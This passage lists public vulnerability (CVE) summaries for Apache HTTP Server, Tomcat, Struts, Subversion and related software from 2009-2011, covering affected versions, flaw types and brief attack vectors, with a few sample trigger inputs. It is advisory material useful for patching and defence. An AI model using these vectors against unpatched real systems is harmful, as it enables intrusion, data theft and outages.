3089| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
3090| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
3091| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
3092| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
3093| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
3094| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
3095| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
3096| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
3097| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
3098| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
3099| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
3100| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
3101| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
3102| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
3103| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
3104| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
3105| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
3106| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
3107| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
3108| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
3109| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
3110| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
3111| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
3112| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
3113| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
3114| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
3115| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
3116| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
3117| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
3118| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
3119| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
3120| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
3121| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
3122| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
3123| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
3124| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
3125| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
3126| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
3127| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3128| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
3129| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
3130| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
3131| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
3132| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
3133| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
3134| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
3135| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
3136| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
3137| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
3138| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
3139| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
3140| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
3141| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
3142| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
3143| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3144| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
3145| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
3146| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
3147| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
3148| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
3149| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
3150| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
3151| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
3152| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
3153| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
3154| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
3155| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
3156| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
3157| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
3158| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
3159| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
3160| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
3161| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
3162| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
3163| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
3164| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
3165| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
3166| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
3167| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
3168| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
3169| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
3170| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
3171| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
3172| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
3173| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
3174| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
3175| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
3176| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
3177| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
3178| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
3179| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
3180| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
3181| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
3182| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
3183| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
3184| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3185| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
3186| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
3187| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
3188| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
3189| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
3190| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
3191| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
3192| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
3193| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
3194| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
